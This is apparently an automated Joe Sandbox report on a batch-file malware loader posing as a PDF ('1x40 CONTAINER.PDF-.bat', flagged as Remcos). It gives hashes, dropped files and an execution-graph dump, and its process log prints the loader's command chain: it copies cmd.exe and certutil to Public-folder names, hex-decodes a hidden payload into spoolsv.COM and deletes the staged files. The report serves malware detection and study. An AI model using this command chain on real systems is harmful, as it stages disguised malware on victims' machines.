  • cmd.exe started 4 other processes, one of which started kn.exe

Antivirus detection (Source | Detection | Scanner | Label):

  • 1x40 CONTAINER.PDF-.bat | 27% | ReversingLabs | Script-BAT.Trojan.Remcos
  • C:\Users\Public\alpha.exe | 0% | ReversingLabs
  • C:\Users\Public\kn.exe | 0% | ReversingLabs

No Antivirus matches
No contacted domains info
URLs found in memory or binary data (Name | Source | Malicious | Antivirus Detection | Reputation):

  • https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP | kn.exe, 00000006.00000000.1666357084.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1669885259.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1673228008.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1671803447.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr | false | (none) | high
  • https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc | kn.exe | false | (none) | high
  • https://login.microsoftonline.com/%s/oauth2/authorize | kn.exe | false | (none) | high
  • https://login.microsoftonline.com/%s/oauth2/token | kn.exe | false | (none) | high
  • https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah | kn.exe, 00000006.00000000.1666357084.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1669885259.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1673228008.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1671803447.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr | false | (none) | high
  • https://%ws/%ws_%ws_%ws/service.svc/%ws | kn.exe | false | (none) | high
  • https://enterpriseregistration.windows.net/EnrollmentServer/device/ | kn.exe | false | (none) | high
  • https://enterpriseregistration.windows.net/EnrollmentServer/key/ | kn.exe | false | (none) | high
                  No contacted IP infos
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1569543
Start date and time:2024-12-05 20:30:48 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 8s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:11
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:1x40 CONTAINER.PDF-.bat
Detection:MAL
Classification:mal84.bank.evad.winBAT@20/8@0/0
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 60
• Number of non-executed functions: 206
Cookbook Comments:
• Found application associated with file extension: .bat
• Stop behavior analysis, all processes terminated
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• VT rate limit hit for: 1x40 CONTAINER.PDF-.bat
No simulations
No context
Match: C:\Users\Public\alpha.exe. Associated samples seen in Joe Sandbox (Sample Name | Detection | Threat Name):
• saw.bat | malicious | Remcos, DBatLoader
• A1 igazol#U00e1s.cmd | malicious | DBatLoader, FormBook
• Documentazione_Doganale_richieste_di_copia.cmd | malicious | DBatLoader
• 78326473_PDF.cmd | malicious | DBatLoader
• iuhmzvlH.cmd | malicious | Unknown
• USD470900_COPY_800BLHSBC882001.PDF.bat | malicious | Remcos, DBatLoader
• Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer
• Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer
• #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmd | malicious | Unknown
Process:C:\Windows\System32\extrac32.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:modified
Size (bytes):289792
Entropy (8bit):6.135598950357573
Encrypted:false
SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: saw.bat, Detection: malicious
• Filename: A1 igazol#U00e1s.cmd, Detection: malicious
• Filename: Documentazione_Doganale_richieste_di_copia.cmd, Detection: malicious
• Filename: 78326473_PDF.cmd, Detection: malicious
• Filename: iuhmzvlH.cmd, Detection: malicious
• Filename: USD470900_COPY_800BLHSBC882001.PDF.bat, Detection: malicious
• Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious
• Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious
• Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmd, Detection: malicious
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................
Process:C:\Windows\System32\extrac32.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:modified
Size (bytes):1651712
Entropy (8bit):6.144018815244304
Encrypted:false
SSDEEP:24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
MD5:F17616EC0522FC5633151F7CAA278CAA
SHA1:79890525360928A674D6AEF11F4EDE31143EEC0D
SHA-256:D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
SHA-512:3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u}{h1..;1..;1..;..;0..;%w.:2..;%w.:*..;%w.:!..;%w.:...;1..;...;%w.:...;%w.;0..;%w.:0..;Rich1..;................PE..d...+. H.........."..................L.........@....................................q.....`.......... ......................................@Q.......`..@........x..............l'..p5..T...........................`(..............x)......XC.......................text............................... ..`.rdata..T...........................@..@.data....&..........................@....pdata...x.......z...|..............@..@.didat.......P......................@....rsrc...@....`......................@..@.reloc..l'.......(..................@..B........................................................................................................................................................................................................................
Process:C:\Users\Public\alpha.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):104
Entropy (8bit):4.403504238247217
Encrypted:false
SSDEEP:3:HnRthLK5aTRECUAdROGCOwXWnjTRrGIAOFZRMQcv:HRoAREYTOGjHVF+
MD5:E14D0D771A7FEB9D78EA3DCA9197BA2A
SHA1:48E363AAD601D9073D803AA9D224BF9A7FC39119
SHA-256:0C13A861207709C246F13ACE164529F31F2F91CF14BD37795192D5B37E965BE6
SHA-512:3460F93FEA31D68E49B1B82EDCB8A2A9FCCE34910DD04DEE7BD7503DB8DAB6D1D5C73CBD2C15156DCB601512AD68DE6FEF7DCB8F8A72A8A0747248B378C17CF9
Malicious:false
Preview:The system cannot find message text for message number 0x400023a1 in the message file for Application...
File type:Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
Entropy (8bit):4.969115739297388
TrID:
• Text - UTF-16 (LE) encoded (2002/1) 66.67%
• MP3 audio (1001/1) 33.33%
File name:1x40 CONTAINER.PDF-.bat
File size:3'675'586 bytes
MD5:91f00c06e8cc61fe9239eefdb0dd0c03
SHA1:d37a062f52f67920062bc5c6bf67a846ac431e9e
SHA256:c155d1fac78a328deb5fc50e3a779cb1210abdbb22fea06dfcdeea93e5d1fa7e
SHA512:fd8f0a8bedac0ca36d89e2ecbdf2ac445ff1ee4e0a298791b75bcfdf87d21dc5a71ea757b0ee4aeb82f29f55f839eb313f1fe15760e9612b80dbf5b4d326ca0a
SSDEEP:49152:ZbnfQw2CN7WB0bIUvBafMtLz4Grc+UcqodC2W:E
TLSH:C4064E9739BF1F87170E366B7F4BAB444A9ECC240A83DB8C42D611D8580B27F69F0959
                                    File Content Preview:..&@cls&@set "_..=Rfoc 7NDyWUq13FOX20QjaLIlwkg8VM9uiASHrCtTnKEedGYpZsP6B4zm@v5hJxb"..%_..:~57,1%%_..:~50,1%%_..:~44,1%%_..:~39,1%%_..:~4,1%"_....=%_..:~46,1%%_..:~15,1%%_..:~49,1%%_..:~0,1%%_..:~37,1%%_..:~42,1%%_..:~23,1%%_..:~40,1%%_..:~19,1%%_..:~60,1%
Icon Hash:9686878b929a9886
No network behavior found


Target ID:0
Start time:14:31:37
Start date:05/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "
Imagebase:0x7ff6f9610000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:1
Start time:14:31:37
Start date:05/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:2
Start time:14:31:37
Start date:05/12/2024
Path:C:\Windows\System32\extrac32.exe
Wow64 process (32bit):false
Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Imagebase:0x7ff619ee0000
File size:35'328 bytes
MD5 hash:41330D97BF17D07CD4308264F3032547
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:3
Start time:14:31:38
Start date:05/12/2024
Path:C:\Users\Public\alpha.exe
Wow64 process (32bit):false
Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Imagebase:0x7ff755ca0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation:high
Has exited:true

Target ID:4
Start time:14:31:38
Start date:05/12/2024
Path:C:\Windows\System32\extrac32.exe
Wow64 process (32bit):false
Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Imagebase:0x7ff619ee0000
File size:35'328 bytes
MD5 hash:41330D97BF17D07CD4308264F3032547
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:5
Start time:14:31:38
Start date:05/12/2024
Path:C:\Users\Public\alpha.exe
Wow64 process (32bit):false
Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
Imagebase:0x7ff755ca0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:14:31:38
Start date:05/12/2024
Path:C:\Users\Public\kn.exe
Wow64 process (32bit):false
Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
Imagebase:0x7ff6c5450000
File size:1'651'712 bytes
MD5 hash:F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation:moderate
Has exited:true

Target ID:7
Start time:14:31:39
Start date:05/12/2024
Path:C:\Users\Public\alpha.exe
Wow64 process (32bit):false
Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
Imagebase:0x7ff755ca0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:14:31:39
Start date:05/12/2024
Path:C:\Users\Public\kn.exe
Wow64 process (32bit):false
Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
Imagebase:0x7ff6c5450000
File size:1'651'712 bytes
MD5 hash:F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:9
Start time:14:31:39
Start date:05/12/2024
Path:C:\Users\Public\alpha.exe
Wow64 process (32bit):false
Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Imagebase:0x7ff755ca0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:14:31:39
Start date:05/12/2024
Path:C:\Users\Public\alpha.exe
Wow64 process (32bit):false
Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S
Imagebase:0x7ff755ca0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true


                                      Execution Graph

                                      Execution Coverage:5.5%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:33.6%
                                      Total number of Nodes:816
                                      Total number of Limit Nodes:27
                                      execution_graph: interactive graph widget data (node and edge listing of functions and API calls at addresses in the 0x7ff755c... range, matching the alpha.exe imagebase shown above); the listing is truncated at the end of the page.
API calls 19411->19413 19412->19409 19412->19411 19412->19412 19422 7ff755ca73ab 19412->19422 19414 7ff755cc4844 longjmp 19413->19414 19415 7ff755cc485a 19414->19415 19416 7ff755ca7348 166 API calls 19415->19416 19417 7ff755cc487b 19416->19417 19418 7ff755ca7348 166 API calls 19417->19418 19419 7ff755cc48ad 19418->19419 19420 7ff755ca7348 166 API calls 19419->19420 19421 7ff755ca72ff 19420->19421 19421->19361 19421->19367 19424 7ff755ca7401 19423->19424 19425 7ff755cc485a 19423->19425 19424->19383 19426 7ff755ca7348 168 API calls 19425->19426 19427 7ff755cc487b 19426->19427 19428 7ff755ca7348 168 API calls 19427->19428 19429 7ff755cc48ad 19428->19429 19430 7ff755ca7348 168 API calls 19429->19430 19431 7ff755cc48be 19430->19431 19431->19383 16763 7ff755cb8d80 16764 7ff755cb8da4 16763->16764 16765 7ff755cb8dbf Sleep 16764->16765 16766 7ff755cb8db6 16764->16766 16765->16764 16767 7ff755cb8ddb _amsg_exit 16766->16767 16773 7ff755cb8de7 16766->16773 16767->16773 16768 7ff755cb8e56 _initterm 16770 7ff755cb8e73 _IsNonwritableInCurrentImage 16768->16770 16769 7ff755cb8e3c 16777 7ff755cb37d8 GetCurrentThreadId OpenThread 16770->16777 16773->16768 16773->16769 16773->16770 16810 7ff755cb04f4 16777->16810 16779 7ff755cb3839 HeapSetInformation RegOpenKeyExW 16780 7ff755cbe9f8 RegQueryValueExW RegCloseKey 16779->16780 16781 7ff755cb388d 16779->16781 16783 7ff755cbea41 GetThreadLocale 16780->16783 16782 7ff755cb5920 VirtualQuery VirtualQuery 16781->16782 16784 7ff755cb38ab GetConsoleOutputCP GetCPInfo 16782->16784 16797 7ff755cb3919 16783->16797 16784->16783 16785 7ff755cb38f1 memset 16784->16785 16785->16797 16786 7ff755cb4d5c 391 API calls 16786->16797 16787 7ff755ca3240 166 API calls 16787->16797 16788 7ff755cbeb27 _setjmp 16788->16797 16789 7ff755cb3948 _setjmp 16789->16797 16790 7ff755cc8530 370 API calls 16790->16797 16791 7ff755cb01b8 6 API calls 16791->16797 16792 7ff755cb4c1c 166 API calls 16792->16797 16793 7ff755cadf60 481 API calls 16793->16797 16794 7ff755cbeb71 
_setmode 16794->16797 16795 7ff755cb86f0 182 API calls 16795->16797 16796 7ff755cb0580 12 API calls 16798 7ff755cb398b GetConsoleOutputCP GetCPInfo 16796->16798 16797->16780 16797->16786 16797->16787 16797->16788 16797->16789 16797->16790 16797->16791 16797->16792 16797->16793 16797->16794 16797->16795 16797->16796 16799 7ff755cb58e4 EnterCriticalSection LeaveCriticalSection 16797->16799 16801 7ff755cabe00 647 API calls 16797->16801 16802 7ff755cb58e4 EnterCriticalSection LeaveCriticalSection 16797->16802 16800 7ff755cb04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16798->16800 16799->16797 16800->16797 16801->16797 16803 7ff755cbebbe GetConsoleOutputCP GetCPInfo 16802->16803 16804 7ff755cb04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16803->16804 16805 7ff755cbebe6 16804->16805 16806 7ff755cabe00 647 API calls 16805->16806 16807 7ff755cb0580 12 API calls 16805->16807 16806->16805 16808 7ff755cbebfc GetConsoleOutputCP GetCPInfo 16807->16808 16809 7ff755cb04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16808->16809 16809->16797 16811 7ff755cb0504 16810->16811 16812 7ff755cb051e GetModuleHandleW 16811->16812 16813 7ff755cb054d GetProcAddress 16811->16813 16814 7ff755cb056c SetThreadLocale 16811->16814 16812->16811 16813->16811
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                      • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                      • API String ID: 3305344409-4288247545
                                      • Opcode ID: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                      • Instruction ID: 6cbda1688d9998ecbbdeea0667299a279aa58d082313e39f66873e59abce8305
                                      • Opcode Fuzzy Hash: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                      • Instruction Fuzzy Hash: D742B6ABA0868385EF50AB1198542B9E7A0EF85FACFCC4234D95E477D5DF7CE9448320

                                      Control-flow Graph

                                      control_flow_graph 216 7ff755caaa54-7ff755caaa98 call 7ff755cacd90 219 7ff755cbbf5a-7ff755cbbf70 call 7ff755cb4c1c call 7ff755caff70 216->219 220 7ff755caaa9e 216->220 221 7ff755caaaa5-7ff755caaaa8 220->221 223 7ff755caacde-7ff755caad00 221->223 224 7ff755caaaae-7ff755caaac8 wcschr 221->224 229 7ff755caad06 223->229 224->223 226 7ff755caaace-7ff755caaae9 towlower 224->226 226->223 228 7ff755caaaef-7ff755caaaf3 226->228 231 7ff755caaaf9-7ff755caaafd 228->231 232 7ff755cbbeb7-7ff755cbbec4 call 7ff755cceaf0 228->232 233 7ff755caad0d-7ff755caad1f 229->233 235 7ff755cbbbcf 231->235 236 7ff755caab03-7ff755caab07 231->236 243 7ff755cbbec6-7ff755cbbed8 call 7ff755ca3240 232->243 244 7ff755cbbf43-7ff755cbbf59 call 7ff755cb4c1c 232->244 237 7ff755caad22-7ff755caad2a call 7ff755cb13e0 233->237 245 7ff755cbbbde 235->245 239 7ff755caab09-7ff755caab0d 236->239 240 7ff755caab7d-7ff755caab81 236->240 237->221 246 7ff755cbbe63 239->246 248 7ff755caab13-7ff755caab17 239->248 240->246 247 7ff755caab87-7ff755caab95 240->247 243->244 261 7ff755cbbeda-7ff755cbbee9 call 7ff755ca3240 243->261 244->219 256 7ff755cbbbea-7ff755cbbbec 245->256 259 7ff755cbbe72-7ff755cbbe88 call 7ff755ca3278 call 7ff755cb4c1c 246->259 252 7ff755caab98-7ff755caaba0 247->252 248->240 253 7ff755caab19-7ff755caab1d 248->253 252->252 257 7ff755caaba2-7ff755caabb3 call 7ff755cacd90 252->257 253->245 258 7ff755caab23-7ff755caab27 253->258 266 7ff755cbbbf8-7ff755cbbc01 256->266 257->219 272 7ff755caabb9-7ff755caabde call 7ff755cb13e0 call 7ff755cb33a8 257->272 258->256 263 7ff755caab2d-7ff755caab31 258->263 281 7ff755cbbe89-7ff755cbbe8c 259->281 276 7ff755cbbef3-7ff755cbbef9 261->276 277 7ff755cbbeeb-7ff755cbbef1 261->277 263->229 268 7ff755caab37-7ff755caab3b 263->268 266->233 268->266 269 7ff755caab41-7ff755caab45 268->269 273 7ff755cbbc06-7ff755cbbc2a call 7ff755cb13e0 269->273 274 7ff755caab4b-7ff755caab4f 269->274 305 7ff755caac75 272->305 306 7ff755caabe4-7ff755caabe7 
272->306 298 7ff755cbbc5a-7ff755cbbc61 273->298 299 7ff755cbbc2c-7ff755cbbc4c _wcsnicmp 273->299 279 7ff755caad2f-7ff755caad33 274->279 280 7ff755caab55-7ff755caab78 call 7ff755cb13e0 274->280 276->244 282 7ff755cbbefb-7ff755cbbf0d call 7ff755ca3240 276->282 277->244 277->276 290 7ff755cbbc66-7ff755cbbc8a call 7ff755cb13e0 279->290 291 7ff755caad39-7ff755caad3d 279->291 280->221 286 7ff755cbbe92-7ff755cbbeaa call 7ff755ca3278 call 7ff755cb4c1c 281->286 287 7ff755caacbe 281->287 282->244 312 7ff755cbbf0f-7ff755cbbf21 call 7ff755ca3240 282->312 340 7ff755cbbeab-7ff755cbbeb6 call 7ff755cb4c1c 286->340 295 7ff755caacc0-7ff755caacc7 287->295 319 7ff755cbbcc4-7ff755cbbcdc 290->319 320 7ff755cbbc8c-7ff755cbbcaa _wcsnicmp 290->320 300 7ff755caad43-7ff755caad49 291->300 301 7ff755cbbcde-7ff755cbbd02 call 7ff755cb13e0 291->301 295->295 309 7ff755caacc9-7ff755caacda 295->309 307 7ff755cbbd31-7ff755cbbd4f _wcsnicmp 298->307 299->298 313 7ff755cbbc4e-7ff755cbbc55 299->313 303 7ff755caad4f-7ff755caad68 300->303 304 7ff755cbbd5e-7ff755cbbd65 300->304 329 7ff755cbbd04-7ff755cbbd24 _wcsnicmp 301->329 330 7ff755cbbd2a 301->330 316 7ff755caad6a 303->316 317 7ff755caad6d-7ff755caad70 303->317 304->303 314 7ff755cbbd6b-7ff755cbbd73 304->314 323 7ff755caac77-7ff755caac7f 305->323 306->287 318 7ff755caabed-7ff755caac0b call 7ff755cacd90 * 2 306->318 325 7ff755cbbbc2-7ff755cbbbca 307->325 326 7ff755cbbd55 307->326 309->223 312->244 343 7ff755cbbf23-7ff755cbbf35 call 7ff755ca3240 312->343 315 7ff755cbbbb3-7ff755cbbbb7 313->315 331 7ff755cbbe4a-7ff755cbbe5e 314->331 332 7ff755cbbd79-7ff755cbbd8b iswxdigit 314->332 333 7ff755cbbbba-7ff755cbbbbd call 7ff755cb13e0 315->333 316->317 317->237 318->340 358 7ff755caac11-7ff755caac14 318->358 319->307 320->319 327 7ff755cbbcac-7ff755cbbcbf 320->327 323->287 335 7ff755caac81-7ff755caac85 323->335 325->221 326->304 327->315 329->330 341 7ff755cbbbac 329->341 330->307 331->333 332->331 337 7ff755cbbd91-7ff755cbbda3 iswxdigit 332->337 333->325 342 
7ff755caac88-7ff755caac8f 335->342 337->331 345 7ff755cbbda9-7ff755cbbdbb iswxdigit 337->345 340->232 341->315 342->342 347 7ff755caac91-7ff755caac94 342->347 343->244 355 7ff755cbbf37-7ff755cbbf3e call 7ff755ca3240 343->355 345->331 351 7ff755cbbdc1-7ff755cbbdd7 iswdigit 345->351 347->287 349 7ff755caac96-7ff755caacaa wcsrchr 347->349 349->287 354 7ff755caacac-7ff755caacb9 call 7ff755cb1300 349->354 356 7ff755cbbddf-7ff755cbbdeb towlower 351->356 357 7ff755cbbdd9-7ff755cbbddd 351->357 354->287 355->244 361 7ff755cbbdee-7ff755cbbe0f iswdigit 356->361 357->361 358->340 362 7ff755caac1a-7ff755caac33 memset 358->362 363 7ff755cbbe11-7ff755cbbe15 361->363 364 7ff755cbbe17-7ff755cbbe23 towlower 361->364 362->305 365 7ff755caac35-7ff755caac4b wcschr 362->365 366 7ff755cbbe26-7ff755cbbe45 call 7ff755cb13e0 363->366 364->366 365->305 367 7ff755caac4d-7ff755caac54 365->367 366->331 368 7ff755caad72-7ff755caad91 wcschr 367->368 369 7ff755caac5a-7ff755caac6f wcschr 367->369 371 7ff755caaf03-7ff755caaf07 368->371 372 7ff755caad97-7ff755caadac wcschr 368->372 369->305 369->368 371->305 372->371 373 7ff755caadb2-7ff755caadc7 wcschr 372->373 373->371 374 7ff755caadcd-7ff755caade2 wcschr 373->374 374->371 375 7ff755caade8-7ff755caadfd wcschr 374->375 375->371 376 7ff755caae03-7ff755caae18 wcschr 375->376 376->371 377 7ff755caae1e-7ff755caae21 376->377 378 7ff755caae24-7ff755caae27 377->378 378->371 379 7ff755caae2d-7ff755caae40 iswspace 378->379 380 7ff755caae42-7ff755caae49 379->380 381 7ff755caae4b-7ff755caae5e 379->381 380->378 382 7ff755caae66-7ff755caae6d 381->382 382->382 383 7ff755caae6f-7ff755caae77 382->383 383->259 384 7ff755caae7d-7ff755caae97 call 7ff755cb13e0 383->384 387 7ff755caae9a-7ff755caaea4 384->387 388 7ff755caaea6-7ff755caaead 387->388 389 7ff755caaebc-7ff755caaef8 call 7ff755cb0a6c call 7ff755caff70 * 2 387->389 388->389 390 7ff755caaeaf-7ff755caaeba 388->390 389->323 397 7ff755caaefe 389->397 390->387 390->389 397->281
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                      • String ID: :$:$:$:ON$OFF
                                      • API String ID: 972821348-467788257
                                      • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                      • Instruction ID: 6d8c5db5e443c0b85de01439dc228832c7d86a3fdcf941a2386b4f2445fa7f0b
                                      • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                      • Instruction Fuzzy Hash: 3422A1AFA0868386FB54BF219814279EA91EF45F9CFCC8535C90E47795EF7CA840C260

                                      Control-flow Graph

